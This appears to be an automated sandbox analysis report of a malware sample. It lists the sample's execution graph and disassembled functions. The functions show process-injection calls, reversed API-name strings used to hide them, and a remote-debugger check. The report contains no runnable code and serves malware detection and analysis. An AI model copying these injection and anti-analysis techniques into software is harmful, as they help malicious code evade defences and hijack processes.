NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26292->26293 26294 2ac4998 26293->26294 26297 2ab8408 GetModuleHandleA GetProcAddress WinExec 26294->26297 26296 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26295->26296 26309 2ac9ea9 26296->26309 26301 2ac49aa 26297->26301 26299 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26298->26299 26300 2ac8963 26299->26300 26302 2ab8798 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26300->26302 26306 2ac49e0 26301->26306 26303 2ac8982 26302->26303 26304 2ab8798 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26303->26304 26305 2ac8996 26304->26305 26307 2ab8798 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26305->26307 26314 2ac4a17 26306->26314 26308 2ac89aa 26307->26308 26310 2ab8798 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26308->26310 26311 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26309->26311 26312 2ac89be 26310->26312 26320 2ac9f25 26311->26320 26313 2ab8798 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26312->26313 26315 2ac89d2 26313->26315 26316 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26314->26316 26317 2ab8798 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26315->26317 26318 2ac4a30 26316->26318 26323 2ac89e6 26317->26323 26319 2ac4a51 26318->26319 26322 2ac4a88 26319->26322 26321 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26320->26321 26327 2ac9fa1 26321->26327 26324 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26322->26324 26325 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26323->26325 26326 2ac4aac 26324->26326 26333 2ac8a6d 26325->26333 26328 2ac4ae5 26326->26328 26329 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26327->26329 26330 2ac4b1c 26328->26330 26336 2aca01d 26329->26336 26331 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26330->26331 26332 2ac4b28 26331->26332 26335 2ac4b43 26332->26335 26334 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26333->26334 26334->25901 26341 2ac4b98 26335->26341 26337 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26336->26337 26338 2aca099 26337->26338 26339 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26338->26339 26340 2aca0a8 26339->26340 26342 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26340->26342 26347 2ac4bb4 26341->26347 26343 2aca0b7 26342->26343 26344 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26343->26344 26345 2aca0c6 26344->26345 26346 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26345->26346 26348 2aca0d5 26346->26348 26355 2ac4c04 26347->26355 26349 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26348->26349 26350 2aca0e4 26349->26350 26351 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26350->26351 26352 2aca0f3 26351->26352 26353 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26352->26353 26354 2aca102 26353->26354 26356 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26354->26356 26362 2ac4c21 26355->26362 26357 2aca111 26356->26357 26358 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26357->26358 26359 2aca120 26358->26359 26360 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26359->26360 26361 2aca12f 26360->26361 26363 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26361->26363 26368 2ac4c43 26362->26368 26364 2aca13e 26363->26364 26365 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26364->26365 26366 2aca14d 26365->26366 26367 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26366->26367 26369 2aca15c 26367->26369 26368->26373 26370 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26369->26370 26371 2aca16b 26370->26371 26372 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26371->26372 26374 2aca17a 26372->26374 26373->25609 26375 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26374->26375 26376 2aca1f6 26375->26376 26377 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26376->26377 26378 2aca229 26377->26378 26379 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26378->26379 26380 2aca25c 26379->26380 26381 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26380->26381 26382 2aca28f 26381->26382 26383 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26382->26383 26384 2aca2c2 26383->26384 26385 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26384->26385 26386 2aca2f5 26385->26386 26387 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26386->26387 26388 2aca328 26387->26388 26389 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26388->26389 26390 2aca35b 26389->26390 26391 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26390->26391 26392 2aca3d7 26391->26392 26393 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26392->26393 26394 2aca453 26393->26394 26395 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26394->26395 26396 2aca4cf 26395->26396 26397 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26396->26397 26398 2aca502 26397->26398 26399 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26398->26399 26400 2aca535 26399->26400 26401 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26400->26401 26402 2aca568 26401->26402 26403 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26402->26403 26404 2aca59b 26403->26404 26405 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26404->26405 26406 2aca5ce 26405->26406 26407 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26406->26407 26408 2aca601 26407->26408 26409 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26408->26409 26410 2aca634 26409->26410 26411 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26410->26411 26412 2aca667 26411->26412 26413 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26412->26413 26414 2aca69a 26413->26414 26415 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26414->26415 26416 2aca6cd 26415->26416 26417 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26416->26417 26418 2aca700 26417->26418 26419 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26418->26419 26420 2aca733 26419->26420 26421 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26420->26421 26422 2aca766 26421->26422 26423 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26422->26423 26424 2aca799 26423->26424 26425 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26424->26425 26426 2aca7cc 26425->26426 26427 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26426->26427 26428 2aca7ff 26427->26428 26429 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26428->26429 26430 2aca832 26429->26430 26431 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26430->26431 26432 2aca865 26431->26432 26433 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26432->26433 26434 2aca898 26433->26434 26435 2ab8184 GetModuleHandleA GetProcAddress FlushInstructionCache 26434->26435 26436 2aca8a7 26435->26436 26437 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26436->26437 26438 2aca923 26437->26438 26439 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26438->26439 26440 2aca99f 26439->26440 26441 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26440->26441 26441->25026 26443 2ab8712 26442->26443 26459 2ab80c0 26443->26459 26445 2ab873d 26463 2ab7cf8 26445->26463 26447 2ab876b 26447->24999 26449 2ab8830 26448->26449 26450 2ab7cf8 3 API calls 26449->26450 26451 2ab88dd 26450->26451 26451->25003 26453 2abebfd 26452->26453 26454 2abec18 CheckRemoteDebuggerPresent 26453->26454 26455 2abec2a 26453->26455 26454->26455 26455->25028 26457 2aa46aa 26456->26457 26457->26457 26458->25507 26460 2ab80e5 26459->26460 26461 2ab8118 GetProcAddress 26460->26461 26462 2ab8147 26461->26462 26462->26445 26464 2ab7d1d 26463->26464 26470 2ab8018 26464->26470 26466 2ab7d4d 26467 2ab80c0 GetProcAddress 26466->26467 26468 2ab7d53 NtWriteVirtualMemory 26467->26468 26469 2ab7d8c 26468->26469 26469->26447 26471 2ab803b 26470->26471 26472 2ab80c0 GetProcAddress 26471->26472 26473 2ab8061 GetModuleHandleA 26472->26473 26474 2ab8087 26473->26474 26474->26466

                                                                                                    Executed Functions

                                                                                                    Function 02AB79AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
                                                                                                      • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AB7A1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                    • API String ID: 421316089-445027087
                                                                                                    • Opcode ID: 63843e1d3ef46a0960a6b982f79c373f29d45aded4a7a09cd32257029f31405a
                                                                                                    • Instruction ID: a77b7ddcdf62c368bdcb27c648dc5fb985c28b7418d2ddb1b10012b918a7d51e
                                                                                                    • Opcode Fuzzy Hash: 63843e1d3ef46a0960a6b982f79c373f29d45aded4a7a09cd32257029f31405a
                                                                                                    • Instruction Fuzzy Hash: C6115E75690208BFEB02EFA8DD91EDEB7ADEF8D710F418465B904D7641DA70AA10CB60
                                                                                                    Function 02AB79AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
                                                                                                      • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AB7A1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                    • API String ID: 421316089-445027087
                                                                                                    • Opcode ID: 7583f65c5655cfa2693c3b4731b26b1dca0e08e88ec55c3e61ad0090e40a8928
                                                                                                    • Instruction ID: 9b73e785e843a1e18e4cd6864f2417f2cc359c02d0886a59a7ad8a792dfe2a81
                                                                                                    • Opcode Fuzzy Hash: 7583f65c5655cfa2693c3b4731b26b1dca0e08e88ec55c3e61ad0090e40a8928
                                                                                                    • Instruction Fuzzy Hash: 53115E75690208BFEB02EF98DD91EDEB7ADEF8D710F418465B504D7641DA70AA10CB60
                                                                                                    Function 02AB824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
                                                                                                      • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
                                                                                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AB82BD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleMemoryModuleProcReadVirtual
                                                                                                    • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                    • API String ID: 2004920654-737317276
                                                                                                    • Opcode ID: aa00350781c87c9eb6186dc28789440f2e729fa9712c9d74fe75567291fd23d1
                                                                                                    • Instruction ID: f91e2454de6939e4c3dda8f5ff18aea9f4f56a2d2033a686917aa1afed13fa4f
                                                                                                    • Opcode Fuzzy Hash: aa00350781c87c9eb6186dc28789440f2e729fa9712c9d74fe75567291fd23d1
                                                                                                    • Instruction Fuzzy Hash: 0E015775A80208BFEB02EFA8D991E9ABBEEEF4C700F418460F404D7601CA74A910CB64
                                                                                                    Function 02AB7CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
                                                                                                      • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
                                                                                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AB7D6C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                                                    • String ID: Ntdll$yromeMlautriVetirW
                                                                                                    • API String ID: 4260932595-3542721025
                                                                                                    • Opcode ID: de48801b545988182b3a915e80c5c1d8e9b280f1e200b72880b7a7c2ab16f8c0
                                                                                                    • Instruction ID: 8e8e16b7740f9011144adb34aebbfe2add3866e9f3b74e07f81cd5b13045878b
                                                                                                    • Opcode Fuzzy Hash: de48801b545988182b3a915e80c5c1d8e9b280f1e200b72880b7a7c2ab16f8c0
                                                                                                    • Instruction Fuzzy Hash: 0E012175650204BFDB02EF98DD51E9ABBEDFF8C750F514451B504E7681DA70A910CF60
                                                                                                    Function 02AB84BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
                                                                                                      • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02AB8521
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                    • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                    • API String ID: 2801472262-2520021413
                                                                                                    • Opcode ID: 85d395abacd604926b9741400d842b621477209a6a3049de18f051ae1e124e7d
                                                                                                    • Instruction ID: 2c4987152b26f2347d05760f4093cb86c2bbfd2f9f19991242b6564506aac8bb
                                                                                                    • Opcode Fuzzy Hash: 85d395abacd604926b9741400d842b621477209a6a3049de18f051ae1e124e7d
                                                                                                    • Instruction Fuzzy Hash: 54018F74690208BFEB06EBA8D991A9EBBAEEF4D750F518860B40497641CF74A900CA20
                                                                                                    Function 02AB85D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
                                                                                                      • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
                                                                                                    • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02AB8660
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressCreateHandleModuleProcProcessUser
                                                                                                    • String ID: CreateProcessAsUserW$Kernel32
                                                                                                    • API String ID: 4105707577-2353454454
                                                                                                    • Opcode ID: caf8a1f1e871f7b8847ad5de689900fc61ad308b6a3fa26a587cef643ad0fa15
                                                                                                    • Instruction ID: 535579cbfa2b60b2669ee6ee21b8d3b6bbf1cd0bc1e38413f8a77ecdbceda8f0
                                                                                                    • Opcode Fuzzy Hash: caf8a1f1e871f7b8847ad5de689900fc61ad308b6a3fa26a587cef643ad0fa15
                                                                                                    • Instruction Fuzzy Hash: 811103B6640208BFDB42EEACDD91FDA3BEDEF0C740F518410BA08D3641CA78E9108B60
                                                                                                    Function 02AB8406 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
                                                                                                      • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
                                                                                                    • WinExec.KERNEL32(?,?), ref: 02AB8470
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressExecHandleModuleProc
                                                                                                    • String ID: Kernel32$WinExec
                                                                                                    • API String ID: 3450258509-3609268280
                                                                                                    • Opcode ID: 025f2ce470c8d855fe6b162ee75c3e5c503649eb3c9d2d7824f0d0e7dbb225b2
                                                                                                    • Instruction ID: a25fdc2ea563c28d0b0cda3567980af6ed7b0636f57eddf90c657f7942c67a8c
                                                                                                    • Opcode Fuzzy Hash: 025f2ce470c8d855fe6b162ee75c3e5c503649eb3c9d2d7824f0d0e7dbb225b2
                                                                                                    • Instruction Fuzzy Hash: 95016D35694204BFEB06EAA8DD51B9A7BEDEF48710F518420B504D7A41DA78AD10CA20
                                                                                                    Function 02AB8408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
                                                                                                      • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
                                                                                                    • WinExec.KERNEL32(?,?), ref: 02AB8470
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressExecHandleModuleProc
                                                                                                    • String ID: Kernel32$WinExec
                                                                                                    • API String ID: 3450258509-3609268280
                                                                                                    • Opcode ID: 51995c02505acc6ecacd5f1e4be011e126b9561e49d96775112e5401f76e5d9f
                                                                                                    • Instruction ID: 5c46304f084d577a54cb11779f2cfb567ceb26df4c939366e8497719d039f3fb
                                                                                                    • Opcode Fuzzy Hash: 51995c02505acc6ecacd5f1e4be011e126b9561e49d96775112e5401f76e5d9f
                                                                                                    • Instruction Fuzzy Hash: E6F08135694204BFEB06EFA8DD51B9A7BEDFF4C710F51C420B504D7A41DE78A910CA20
                                                                                                    Function 02ABEBE8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 8664 2abebe8-2abec02 call 2aa6638 8667 2abec2e-2abec36 8664->8667 8668 2abec04-2abec16 call 2aa6640 8664->8668 8668->8667 8671 2abec18-2abec28 CheckRemoteDebuggerPresent 8668->8671 8671->8667 8672 2abec2a 8671->8672 8672->8667
                                                                                                    APIs
                                                                                                    • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02ABEC21
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                    • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                    • API String ID: 3662101638-539270669
                                                                                                    • Opcode ID: 966353bb8c7356d6871318431cc750284624ae1b06499efb30f809bc8fa3e600
                                                                                                    • Instruction ID: 8478525508e8e40a62b1a2928b871f38f1186d8e91aec8acb3f7817ea1c57f4d
                                                                                                    • Opcode Fuzzy Hash: 966353bb8c7356d6871318431cc750284624ae1b06499efb30f809bc8fa3e600
                                                                                                    • Instruction Fuzzy Hash: CCF0A73090424CBEDB13A7A88A897DDFBAD5F0632AFA807949435721C2EF715640C695

                                                                                                    Non-executed Functions

                                                                                                    Function 02AB8184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
                                                                                                      • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
                                                                                                    • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02AB820E), ref: 02AB81F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressCacheFlushHandleInstructionModuleProc
                                                                                                    • String ID: FlushInstructionCache$Kernel32
                                                                                                    • API String ID: 2392256011-184458249
                                                                                                    • Opcode ID: 2fe5795689543d59ab93637d185d2377fbfbaff3e296e82c96a5443170cd29a1
                                                                                                    • Instruction ID: 49ec2ae5df6b7d14927e37fd192c1f3051c07d5ee6ace95b5bd1635812d4d26f
                                                                                                    • Opcode Fuzzy Hash: 2fe5795689543d59ab93637d185d2377fbfbaff3e296e82c96a5443170cd29a1
                                                                                                    • Instruction Fuzzy Hash: C1018B35A84204BFEB02EFA8DD91F9A77ADEF4CB00F518460B504D3641DA78AD10CA20
                                                                                                    Function 02AB80C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 02AB8125
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: Kernel32$sserddAcorPteG
                                                                                                    • API String ID: 190572456-1372893251
                                                                                                    • Opcode ID: 6d089a321635ca2ea5ff20eda783f1eb583c7b6f50cd410fd21804e8c3cbd890
                                                                                                    • Instruction ID: 0dfa0601b4a8a7f03a54af0352a72be0118820962c652b06cfe88d14e7ae787d
                                                                                                    • Opcode Fuzzy Hash: 6d089a321635ca2ea5ff20eda783f1eb583c7b6f50cd410fd21804e8c3cbd890
                                                                                                    • Instruction Fuzzy Hash: 85018434691304BFEB06EBA8D951A9E77AEEF4C700F518460F40497641DF74A900CE10
                                                                                                    Function 02AB8018 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
                                                                                                    • GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                    • API String ID: 1646373207-1952140341
                                                                                                    • Opcode ID: 2291515ad5fbea1b81ad82ee6483fc7bb3d57e61177a54464ef24127409b97c5
                                                                                                    • Instruction ID: b4a5fd54d9265ab492ddb1234daec7419eeed8cde9f8762049642ef85126f060
                                                                                                    • Opcode Fuzzy Hash: 2291515ad5fbea1b81ad82ee6483fc7bb3d57e61177a54464ef24127409b97c5
                                                                                                    • Instruction Fuzzy Hash: 92F06231694304BFEB16EBA8DD5199A7BADFF497807518560F40093A01DF74AD10CA60

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:0%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:5
                                                                                                    Total number of Limit Nodes:1
                                                                                                    execution_graph 82688 1a342b60 LdrInitializeThunk 82691 1a342c00 82693 1a342c0a 82691->82693 82694 1a342c11 82693->82694 82695 1a342c1f LdrInitializeThunk 82693->82695

                                                                                                    Executed Functions

                                                                                                    Function 00401560 Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 561COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000001.2320930525.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_1_400000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$B$a```$gfff$gfff$gfff$gfff
                                                                                                    • API String ID: 0-3667867154
                                                                                                    • Opcode ID: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                                                    • Instruction ID: 4d4c1e64281832a49f187a404ecdf2e47e159528420c40e4fc39f5ea6f09713e
                                                                                                    • Opcode Fuzzy Hash: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                                                    • Instruction Fuzzy Hash: 3C021771F0011947DB2C9959CC95BFE726AE794304F5881BBEA0AEF3E1E6389F448B44
                                                                                                    Function 1A3435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 7 1a3435c0-1a3435cc LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
